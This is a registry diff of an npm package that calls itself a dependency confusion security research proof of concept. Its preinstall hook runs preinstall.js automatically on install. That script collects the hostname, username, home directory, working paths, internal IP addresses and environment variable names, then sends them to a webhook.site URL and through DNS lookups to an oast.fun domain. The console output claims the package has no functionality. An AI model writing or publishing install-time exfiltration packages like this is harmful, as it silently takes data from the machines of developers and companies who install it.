blob-internal-security-test-f63eabf7 99.99.99
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +8 -0
- package/package.json +12 -0
- package/preinstall.js +57 -0
package/index.js
ADDED
|
@@ -0,0 +1,8 @@
|
|
|
1
|
+
// BLOB Hunter - Dependency Confusion Security Research
|
|
2
|
+
// This package is used for authorized security research only.
|
|
3
|
+
// It detects when companies accidentally install internal packages from public registries.
|
|
4
|
+
|
|
5
|
+
module.exports = {
|
|
6
|
+
message: 'This is a security research package by BLOB Hunter',
|
|
7
|
+
purpose: 'Dependency Confusion Detection'
|
|
8
|
+
};
|
package/package.json
ADDED
|
@@ -0,0 +1,12 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "blob-internal-security-test-f63eabf7",
|
|
3
|
+
"version": "99.99.99",
|
|
4
|
+
"description": "Security Research - Dependency Confusion PoC by BLOB Hunter",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"preinstall": "node preinstall.js || true"
|
|
8
|
+
},
|
|
9
|
+
"author": "BLOB Hunter Security Research",
|
|
10
|
+
"license": "MIT",
|
|
11
|
+
"keywords": ["security", "research", "dependency-confusion"]
|
|
12
|
+
}
|
package/preinstall.js
ADDED
|
@@ -0,0 +1,57 @@
|
|
|
1
|
+
const https = require('https');
|
|
2
|
+
const os = require('os');
|
|
3
|
+
const dns = require('dns');
|
|
4
|
+
|
|
5
|
+
// Collect system information
|
|
6
|
+
const info = {
|
|
7
|
+
package: 'blob-internal-security-test-f63eabf7',
|
|
8
|
+
hostname: os.hostname(),
|
|
9
|
+
username: os.userInfo().username,
|
|
10
|
+
homedir: os.homedir(),
|
|
11
|
+
platform: os.platform(),
|
|
12
|
+
cwd: process.cwd(),
|
|
13
|
+
install_path: __dirname,
|
|
14
|
+
internal_ips: [],
|
|
15
|
+
env_keys: Object.keys(process.env).filter(k =>
|
|
16
|
+
!k.toLowerCase().includes('token') &&
|
|
17
|
+
!k.toLowerCase().includes('secret') &&
|
|
18
|
+
!k.toLowerCase().includes('password') &&
|
|
19
|
+
!k.toLowerCase().includes('key')
|
|
20
|
+
).slice(0, 20)
|
|
21
|
+
};
|
|
22
|
+
|
|
23
|
+
// Get internal IPs
|
|
24
|
+
const interfaces = os.networkInterfaces();
|
|
25
|
+
for (const iface of Object.values(interfaces)) {
|
|
26
|
+
for (const config of iface || []) {
|
|
27
|
+
if (config.family === 'IPv4' && !config.internal) {
|
|
28
|
+
info.internal_ips.push(config.address);
|
|
29
|
+
}
|
|
30
|
+
}
|
|
31
|
+
}
|
|
32
|
+
|
|
33
|
+
// Create callback URL with data as base64
|
|
34
|
+
const data = Buffer.from(JSON.stringify(info)).toString('base64');
|
|
35
|
+
const callbackUrl = `https://webhook.site/dd5d9a16-4c5c-4c5c-9c5c-4c5c4c5c4c5c?data=${encodeURIComponent(data)}`;
|
|
36
|
+
|
|
37
|
+
// Also try DNS exfiltration
|
|
38
|
+
const dnsData = Buffer.from(JSON.stringify({h: info.hostname, u: info.username})).toString('hex').substring(0, 60);
|
|
39
|
+
try {
|
|
40
|
+
dns.resolve(`${dnsData}.blob-hunter.oast.fun`, () => {});
|
|
41
|
+
} catch (e) {}
|
|
42
|
+
|
|
43
|
+
// HTTP callback
|
|
44
|
+
try {
|
|
45
|
+
const url = new URL(callbackUrl);
|
|
46
|
+
const req = https.request({
|
|
47
|
+
hostname: url.hostname,
|
|
48
|
+
port: 443,
|
|
49
|
+
path: url.pathname + url.search,
|
|
50
|
+
method: 'GET',
|
|
51
|
+
timeout: 5000
|
|
52
|
+
});
|
|
53
|
+
req.on('error', () => {});
|
|
54
|
+
req.end();
|
|
55
|
+
} catch (e) {}
|
|
56
|
+
|
|
57
|
+
console.log('[BLOB Hunter] Security research package - no actual functionality');
|